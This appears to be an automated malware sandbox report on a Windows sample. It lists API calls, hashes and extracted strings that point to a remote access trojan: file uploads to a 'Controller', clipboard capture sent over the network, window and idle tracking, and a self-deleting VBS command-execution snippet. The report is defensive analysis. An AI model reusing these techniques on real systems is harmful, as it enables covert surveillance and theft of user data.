                                                  • Opcode ID: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                  • Instruction ID: b66198a42bffced696eb94d9f3abdc54ecf3157c52e3fd06dc0985426ba48be4
                                                  • Opcode Fuzzy Hash: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                  • Instruction Fuzzy Hash: 51216BB1500208FFDF054FA4ED0EAAA7B35EB08302F000125FA19950B2D779EDA1EB18
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                  • Opcode Fuzzy Hash: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $xdF
                                                  • API String ID: 3086580692-731956494
                                                  • Opcode ID: c5897f36d9bc98ad82db375ecebdfc221b86436c866b3cf5b4e1afe33f0c832c
                                                  • Instruction ID: 2d1ece25e1b497defd969945f9de4b01d63c4d7912a1bb42583949d7b10afa87
                                                  • Opcode Fuzzy Hash: c5897f36d9bc98ad82db375ecebdfc221b86436c866b3cf5b4e1afe33f0c832c
                                                  • Instruction Fuzzy Hash: 76B1A0316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB9B
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                    • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                                    • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                                    • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$Temp$exepath$open$xdF
                                                  • API String ID: 1913171305-3121233398
                                                  • Opcode ID: 0364afc3135c355934971198118bb00780e99c8169ca313811eeeab6ea9e3f6f
                                                  • Instruction ID: 050033375253242a90a907d975c9615f3488646990559cd5331657e2136e0730
                                                  • Opcode Fuzzy Hash: 0364afc3135c355934971198118bb00780e99c8169ca313811eeeab6ea9e3f6f
                                                  • Instruction Fuzzy Hash: 514139319001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E4ACA98
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                  • _free.LIBCMT ref: 0045137F
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004513A1
                                                  • _free.LIBCMT ref: 004513B6
                                                  • _free.LIBCMT ref: 004513C1
                                                  • _free.LIBCMT ref: 004513E3
                                                  • _free.LIBCMT ref: 004513F6
                                                  • _free.LIBCMT ref: 00451404
                                                  • _free.LIBCMT ref: 0045140F
                                                  • _free.LIBCMT ref: 00451447
                                                  • _free.LIBCMT ref: 0045144E
                                                  • _free.LIBCMT ref: 0045146B
                                                  • _free.LIBCMT ref: 00451483
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                  APIs
                                                  • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: f34247a8710c7201e600662b46c76ef2eca6a3697578d719aa648414b06a898d
                                                  • Instruction ID: d7ad8a6a5323ad03425d5def7d05b30a9c8ce31cd4ccd690c712fe6c843f15aa
                                                  • Opcode Fuzzy Hash: f34247a8710c7201e600662b46c76ef2eca6a3697578d719aa648414b06a898d
                                                  • Instruction Fuzzy Hash: AD41E8B575060277C61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                  • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474F08,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404E38
                                                  • SetEvent.KERNEL32(00000000,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404E43
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404E4C
                                                  • closesocket.WS2_32(FFFFFFFF), ref: 00404E5A
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404E91
                                                  • SetEvent.KERNEL32(00000000,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404EA2
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404EA9
                                                  • SetEvent.KERNEL32(00000000,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404EBA
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404EBF
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404EC4
                                                  • SetEvent.KERNEL32(00000000,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404ED1
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404ED6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                  • String ID:
                                                  • API String ID: 3658366068-0
                                                  • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                  • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                  APIs
                                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                  • GetLastError.KERNEL32 ref: 00455D6F
                                                  • __dosmaperr.LIBCMT ref: 00455D76
                                                  • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                  • GetLastError.KERNEL32 ref: 00455D8C
                                                  • __dosmaperr.LIBCMT ref: 00455D95
                                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                  • GetLastError.KERNEL32 ref: 00455F31
                                                  • __dosmaperr.LIBCMT ref: 00455F38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: \&G$\&G$`&G
                                                  • API String ID: 269201875-253610517
                                                  • Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                  • Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                  APIs
                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: 0Q$HSG$HSG$xdF
                                                  • API String ID: 3795512280-2554418144
                                                  • Opcode ID: 26ae2a83ac668abf416a5e290dbfa8c6363a9f1d2492c4ba02a52adfd1c8561f
                                                  • Instruction ID: b4a8632174cffc949347442128fe52ffedc09667b4c22c284aa084888e76bad6
                                                  • Opcode Fuzzy Hash: 26ae2a83ac668abf416a5e290dbfa8c6363a9f1d2492c4ba02a52adfd1c8561f
                                                  • Instruction Fuzzy Hash: AC518D716043015ACB15BB72C866ABE77AA9F80349F00483FF642B71E2DF7C9D09865E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(00000000,?,00000000,0040B245,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                  • API String ID: 911427763-3954389425
                                                  • Opcode ID: d58be283279fa0b5f159513bef50b09ce91b365ebeaab1966ea44788cebf7b60
                                                  • Instruction ID: 1462e2e3b317a3feaa81e481452c264ee2198f2d95b6ea563507fc8e19ff55dc
                                                  • Opcode Fuzzy Hash: d58be283279fa0b5f159513bef50b09ce91b365ebeaab1966ea44788cebf7b60
                                                  • Instruction Fuzzy Hash: 7F51E1716043419BC714FB62D846AAE7795AF84308F10093FF546A22E2EF7C9D44C69F
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 0041697C
                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                  • String ID: !D@$xdF
                                                  • API String ID: 2172192267-3540039394
                                                  • Opcode ID: a34dedaf861a9e92a697ca89426b05e6fe495651cba5d4d4b68a742277739527
                                                  • Instruction ID: 51ec5b3583c04982a71d168622c94cade283f75070810aedfe93923cca0dc87c
                                                  • Opcode Fuzzy Hash: a34dedaf861a9e92a697ca89426b05e6fe495651cba5d4d4b68a742277739527
                                                  • Instruction Fuzzy Hash: 41014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                  • GetLastError.KERNEL32(?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                  • __dosmaperr.LIBCMT ref: 0043A926
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                  • GetLastError.KERNEL32(?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                  • __dosmaperr.LIBCMT ref: 0043A963
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401BD9,?), ref: 0043A9A6
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                  • __dosmaperr.LIBCMT ref: 0043A9B7
